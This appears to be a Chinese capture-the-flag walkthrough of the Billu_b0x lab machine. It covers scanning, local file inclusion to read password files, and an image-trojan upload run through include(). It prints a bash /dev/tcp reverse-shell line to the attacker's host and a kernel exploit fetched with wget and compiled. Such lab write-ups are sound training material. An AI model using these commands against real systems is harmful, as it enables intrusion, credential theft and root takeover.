Billu_b0x靶機

信息收集

使用arp-scan 生成網絡接口地址來查看ip

輸入命令:

arp-scan -l

可以查看到我們的目標ip為192.168.187.153

在這里插入圖片描述

nmap掃描端口開放

輸入命令:

nmap -min-rate 10000 -p- 192.168.187.153

可以看到開放2個端口

在這里插入圖片描述

nmap掃描端口信息

輸入命令:

nmap -sC -sT -A -p 22,80 192.168.187.153

在這里插入圖片描述

nmap漏洞腳本掃描

輸入命令:

nmap --script=vuln 192.168.187.153

這里沒有掃描可以利用的信息

在這里插入圖片描述

查看web端

頁面上有一個登錄的地方,但是還不知道密碼,不過提示了一句向我展示你的sql技巧,看樣子是想讓我們使用sql注入

在這里插入圖片描述

掃描子目錄

輸入命令:

dirsearch -u http://192.168.187.153

可以發現一些子目錄

在這里插入圖片描述

輸入命令:

gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x html -u http://192.168.187.153 -t 50

這里也看到了一些子目錄,等下訪問看看

在這里插入圖片描述

這個目錄下查看到phpinfo()信息

在這里插入圖片描述

查看php配置信息

在這個下面可以看到allow_url_fopen是on狀態,可以允許本地文件包含

在這里插入圖片描述

發現登錄頁面

這里看到了另一個新的頁面,但是我們現在沒有密碼,先去找密碼

在這里插入圖片描述

發現文件包含頁面

這里的test目錄下看到了一個新的提示

在這里插入圖片描述

翻譯內容,看來是要我們加上file參數,有可能這里就是文件包含的位置,試一下

在這里插入圖片描述

構造url語句

get請求驗證

我們先嘗試了get請求下的文件包含語句,但是發現沒有成功

http://192.168.187.153/test.php?file=../../../etc/passwd

在這里插入圖片描述

post請求驗證

接下來嘗試一下post請求的文件包含語句。這里可以使用bp來實現,也可以在kali中借助curl這個工具實現,這里使用的后者

輸入命令:

curl -X POST http://192.168.187.153/test.php -d file=…/…/…/etc/passwd

發現成功回顯了信息,證明確實是存在本地文件包含

在這里插入圖片描述

利用文件包含讀取文件信息

既然已經證實存在了文件包含,那我們可以讀取很多之前看不到的文件的信息了

查看add.php

輸入命令:

curl -X POST http://192.168.187.153/test.php -d file=add.php

add.php是一個上傳界面,但是功能無法使用,查看源碼文件發現只是個頁面,沒有后臺處理代碼

在這里插入圖片描述

拿到數據庫的密碼信息

查看c.php

輸入命令:

curl -X POST http://192.168.187.153/test.php -d file=c.php

在這里看到了疑似數據庫的連接用戶名和密碼,等下可以去查看一下

billu:b0x_billu

在這里插入圖片描述

登錄數據庫

返回phpmy頁面嘗試登錄,發現成功登錄。

在這里插入圖片描述

發現版本信息

這里在右下角發現了很多版本的信息

在這里插入圖片描述

發現用戶信息

然后在這個位置又找到了一組登錄的信息

biLLu:hEx_it

在這里插入圖片描述

滲透思路

這里我們有三種思路可選

  • 可以從phpmyadmin的版本入手,查找有無對應的漏洞

輸入命令:

searchsploit phpMyAdmin 3.4.7

但是沒有找到,所以這條路行不通

在這里插入圖片描述

  • phpmyadmin的相關配置文件一般都是config.inc.php

在我們當前可以利用文件包含閱讀其他文件的基礎上,我們可以查看這個配置文件中的內容和信息。可以猜測一下,這個配置文件的存放

位置就是在 phpMy的目錄下,通過URL猜測路徑默認在/var/www/phpmy下面

輸入命令:

curl -X POST http://192.168.187.153/test.php -d file=/var/www/phpmy/config.inc.php

直接發現了root用戶的登錄密碼(我人傻了。這么簡單嗎,sql注入沒用呢,主頁面還沒有登錄呢,我勒個去!!!)

root:roottoor

在這里插入圖片描述

嘗試ssh登錄

直接試試ssh登錄root用戶(還是很懷疑是不是有這么簡單)

輸入命令:

ssh root@192.168.187.153

輸入密碼roottoor 發現成功登錄,然后直接找flag就行(我已經人傻了)

在這里插入圖片描述

  • 第三種就是正常思路了,可以去主頁面登錄用戶名的信息,然后繼續去做就可以

登錄主頁面

雖然上面的方法已經成功拿到了root權限,但是還是想著繼續從其他方向突破試試那我們就回到主頁面登錄嘗試一下,然后發現成功登錄

在這里插入圖片描述

這里登錄進來后,又看到了文件上傳的地點

在這里插入圖片描述

制作圖片木馬

嘗試過了weevely的加密木馬,無法連接,所以還是老老實實反彈shell吧,準備好一張可以上傳的圖片,可以提前試一下,然后準備好我們的php文件,配置好ip和端口

輸入命令:

cat 1.gif 123.php > 2.gif

在這里插入圖片描述

成功合成了圖片

在這里插入圖片描述

上傳圖片木馬

點擊上傳后,發現成功上傳

在這里插入圖片描述

現在先開啟監聽

在這里插入圖片描述

結合之前掃描到的子目錄,我們可以推測照片在uploaded_images/這個目錄下,打開發現果然存在

在這里插入圖片描述

我們打開我們上傳的圖片木馬,回到kali中可以看到并沒有反彈成功,可見直接打開圖片,并不會執行代碼

在這里插入圖片描述

利用文件包含執行圖片木馬中的php語句

這里我們可以使用文件包含來執行圖片里的php語句

輸入命令:

curl -X POST http://192.168.187.153/test.php -d file=/var/www/uploaded_images/3.gif

在這里插入圖片描述

但是kali中無法反彈成功

在這里插入圖片描述

查詢文件包含的函數

這里不知道為什么失敗,查詢一下當前頁面的文件包含函數是什么

輸入命令:

curl -X POST http://192.168.187.153/test.php -d file=test.php

發現是readfile()這個參數

在這里插入圖片描述

經過上網搜查readfile的功能,是屬于任意文件讀取**。**無法執行php代碼。所以我們上傳的php反彈語句無法執行

在這里插入圖片描述

漏洞挖掘

然后這里實在是沒思路了,后來找了半天問了一下大佬,才知道在panel.php這個頁面中存在本地文件包含漏洞

我們查看一下這個文件

輸入命令:

curl -X POST http://192.168.187.153/test.php -d file=panel.php

發現了include()這個函數,那我們可以在這里進行一個文件包含漏洞的利用

在這里插入圖片描述

構造一句話木馬

還是利用圖片木馬的原理,不過這次我們需要構造一句話木馬

在這里插入圖片描述

再次合成圖片木馬

輸入命令:

cat 1.gif shell.php > 4.gif

在這里插入圖片描述

上傳圖片木馬

顯示上傳成功

在這里插入圖片描述

文件包含漏洞利用

上傳成功了,那我們就先試試有沒有效果,bp抓包一下,load=/uploaded_images/4.gif&continue=continue

上面的cmd配置為cmd=cat%20/etc/passwd;ls 這里的空格必須使用url編碼才能執行成功,然后在右面也可以看到返回值

在這里插入圖片描述

那我們先開啟監聽

在這里插入圖片描述

配置反彈語句

echo “bash -i >& /dev/tcp/192.168.187.128/8888 0>&1” | bash

由于之前就實驗了必須使用url編碼才能夠執行語句,所以我們先將語句進行url編碼

在這里插入圖片描述

然后在bp中執行這段語句

在這里插入圖片描述

執行以后就可以發現反彈shell成功了

在這里插入圖片描述

提權思路

這里提權思路有這幾種

sudo提權,suid提權,內核漏洞提權,計劃任務提權

正常情況下,我們肯定是要一個個去試試的,對于這個靶機而言,經過嘗試后,最終要使用的提權方法為內核漏洞提權

查找內核信息

輸入命令:

uname -a

在這里插入圖片描述

輸入命令:

cat /etc/issue.net

在這里插入圖片描述

查找漏洞

然后去查找有無對應的漏洞

輸入命令:

searchsploit linux 3.13

這里找到了一個符合條件的漏洞文件,拿來試試

在這里插入圖片描述

漏洞利用

首先將這個文件拷貝到桌面上

輸入命令:

searchsploit -m 37292.c

在這里插入圖片描述

然后開啟http臨時服務

輸入命令:

python3 -m http.server 80

在這里插入圖片描述

在靶機中使用wget命令下載文件(最好在/tmp目錄下)

在這里插入圖片描述

查看一下文件是否傳輸成功,發現沒有問題

在這里插入圖片描述

提權成功

編譯,賦權,執行

輸入命令:

gcc 37292.c -o exp

chmod 777 exp

./exp

執行完以后就發現已經是root權限了

在這里插入圖片描述

本文來自互聯網用戶投稿,該文觀點僅代表作者本人,不代表本站立場。本站僅提供信息存儲空間服務,不擁有所有權,不承擔相關法律責任。
如若轉載,請注明出處:http://www.pswp.cn/web/45539.shtml
繁體地址,請注明出處:http://hk.pswp.cn/web/45539.shtml
英文地址,請注明出處:http://en.pswp.cn/web/45539.shtml

如若內容造成侵權/違法違規/事實不符,請聯系多彩編程網進行投訴反饋email:809451989@qq.com,一經查實,立即刪除!

相關文章

配置PYTHONPATH環境變量

配置PYTHONPATH環境變量 前言Win系統臨時配置永久配置 Linux系統臨時配置永久配置 前言 在運行py腳本時不僅需要import官方庫,經常會import自己編寫的腳本,但此時會出現模塊找不到的如下報錯。解決方法是配置PYTHONPATH,下文介紹Win系統和Li…

禹神:一小時快速上手Electron,前端Electron開發教程,筆記。一篇文章入門Electron

一、Electron是什么 簡單的一句話,就是用htmlcssjsnodejs(Native Api)做兼容多個系統(Windows、Linux、Mac)的軟件。 官網解釋如下(有點像繞口令): Electron是一個使用 JavaScript、HTML 和 CSS 構建桌面…

Resources.Load返回null

Resources.Load返回null 在unity中Resources.Load從Assets下的任意Resources目錄下讀取資源&#xff0c;比如從Assets\Resources下讀取Cube&#xff08;預制體&#xff09;&#xff0c;當然也可以讀取其他資源 代碼為 GameObject prefab Resources.Load<GameObject>(…

微軟Edge瀏覽器深度解析:性能、安全性與特色功能全面評測

一、引言 自Windows 10操作系統推出以來&#xff0c;微軟Edge瀏覽器作為默認的網頁瀏覽器&#xff0c;憑借其現代化的設計和出色的性能表現&#xff0c;逐漸獲得了用戶的認可。本文旨在對Edge瀏覽器進行深入分析&#xff0c;探討其在多個方面的表現。 二、界面與操作體驗 界面…

在 PostgreSQL 里如何處理數據的存儲優化和數據庫備份的效率平衡?

&#x1f345;關注博主&#x1f397;? 帶你暢游技術世界&#xff0c;不錯過每一次成長機會&#xff01;&#x1f4da;領書&#xff1a;PostgreSQL 入門到精通.pdf 文章目錄 在 PostgreSQL 里如何處理數據的存儲優化和數據庫備份的效率平衡&#xff1f;一、數據存儲優化&#x…

HTML表格表單及框架標簽

一.表格標簽 1.<table></table> 創建表格 2.<caption></caption> 表格的標題 3.<tr></tr>Table Row&#xff08;表格行&#xff09; 4.<td></td>Table Data&#xff08;表格數據&#xff09;其中有屬性rowspan"2&quo…

Linux操作系統——數據庫

數據庫 sun solaris gnu 1、分類&#xff1a; 大型 中型 小型 ORACLE MYSQL/MSSQL SQLITE DBII powdb 關系型數據庫 2、名詞&#xff1a; DB 數據庫 select update database DBMS 數據…

Go中的defer看似很簡單,實則一點都不難

Golang 中的 Defer 在Go語言中&#xff0c;defer語句用于將一個函數調用推遲到外圍函數返回之后執行。它常用于確保某些操作在函數結束時一定會執行&#xff0c;例如資源釋放、文件關閉等。 基本語法 defer語句的基本使用方法如下&#xff1a; func main() {defer fmt.Prin…

距離變換 Distance Transformation

以下為該學習地址的學習筆記&#xff1a;Distance transformation in image - Python OpenCV - GeeksforGeeks 其他學習資料&#xff1a;Morphology - Distance Transform 簡介 距離變換是一種用于計算圖像中每個像素與最近的非零像素之間距離的技術。它通常用于圖像分割和物體…

51單片機5(GPIO簡介)

一、序言&#xff1a;不論學習什么單片機&#xff0c;最簡單的外設莫過于I口的高低電平的操作&#xff0c;接下來&#xff0c;我們將給大家介紹一下如何在創建好的工程模板上面&#xff0c;通過控制51單片機的GPIO來使我們的開發板上的LED來點亮。 二、51單片機GPIO介紹&#…

第三節SHELL腳本中的變量與運算(1.1-1.5)

一,腳本中的變量 1,1什么是變量 在編寫程序是,通常會遇到被操作對象不固定的情況我們需要用一串固定的字符來的表示不固定的值,這就是變量存在的根本意義變量的實現原理就是內存存儲單元的一個符合名稱 1,2 變量的命名規則 變量的名稱中只能包含數字,大小寫字母以及下劃線 …

PySide在Qt Designer中使用QTableView 顯示表格數據

在 PySide6 中&#xff0c;可以使用 Qt Model View 架構中的 QTableView 部件來顯示和編輯表格數據。 1、創建ui文件 在Qt Designer中新建QMainWindow&#xff0c;命名為csvShow.ui。QMainWindow上有兩個部件&#xff1a;tableview和btn_exit。 2、使用pyuic工具將ui文件轉換為…

Kafka(四) Consumer消費者

一&#xff0c;基礎知識 1&#xff0c;消費者與消費組 每個消費者都有對應的消費組&#xff0c;不同消費組之間互不影響。 Partition的消息只能被一個消費組中的一個消費者所消費&#xff0c; 但Partition也可能被再平衡分配給新的消費者。 一個Topic的不同Partition會根據分配…

MySQL集群、Redis集群、RabbitMQ集群

一、MySQL集群 1、集群原理 MySQL-MMM 是 Master-Master Replication Manager for MySQL&#xff08;mysql 主主復制管理器&#xff09;的簡稱。腳本&#xff09;。MMM 基于 MySQL Replication 做的擴展架構&#xff0c;主要用來監控 mysql 主主復制并做失敗轉移。其原理是將真…

環境變量在Gradle中的妙用:構建自動化的秘訣

環境變量在Gradle中的妙用&#xff1a;構建自動化的秘訣 在構建自動化的過程中&#xff0c;環境變量扮演著至關重要的角色。它們允許開發者根據不同的運行環境&#xff08;如開發、測試和生產環境&#xff09;來調整配置&#xff0c;而無需修改代碼。Gradle&#xff0c;作為一…

基于Faster R-CNN的安全帽目標檢測

基于Faster R-CNN的安全帽目標檢測項目通常旨在解決工作場所&#xff0c;特別是建筑工地的安全監管問題。這類項目使用計算機視覺技術&#xff0c;特別是深度學習中的Faster R-CNN算法&#xff0c;來自動檢測工人是否正確佩戴了安全帽&#xff0c;從而確保遵守安全規定并減少事…

實驗一:圖像信號的數字化

目錄 一、實驗目的 二、實驗原理 三、實驗內容 四、源程序及結果 源程序&#xff08;python&#xff09;&#xff1a; 結果&#xff1a; 五、結果分析 一、實驗目的 通過本實驗了解圖像的數字化過程&#xff0c;了解數字圖像的數據矩陣表示法。掌握取樣&#xff08;象素個…

用Python爬蟲能實現什么?得到什么?

Python爬蟲是一種強大的工具&#xff0c;可以用來自動化地從互聯網上抓取數據和信息。使用Python實現爬蟲可以達成多種目的&#xff0c;包括但不限于以下幾個方面&#xff1a; 數據收集&#xff1a; 網頁內容抓取&#xff1a;可以抓取網頁上的文本、圖片、視頻等內容。搜索引擎…

Linux 網絡配置與連接

一、網絡配置 1.1 ifconfig 網卡配置查詢 ifconfig #查看所有啟動的網絡接口信息 ifconfig 指定的網卡 #查看指定網絡接口信息 1.2 修改網絡配置文件 vim /etc/sysconfig/network-scripts/ifcfg-ens33 #ens33網絡配置文…

【電源拓撲】反激拓撲

目錄 工作模式 固定頻率 CCM連續電流模式 DCM不連續電流模式 可變頻率 CRM電流臨界模式 反激電源CRM工作模式為什么要跳頻 反激電源應用場景 為什么反激電源功率做不大 電感電流爬升 反激變壓器的限制條件 精通反激電源設計的關鍵-反激電源變壓器設計 反激電源變壓…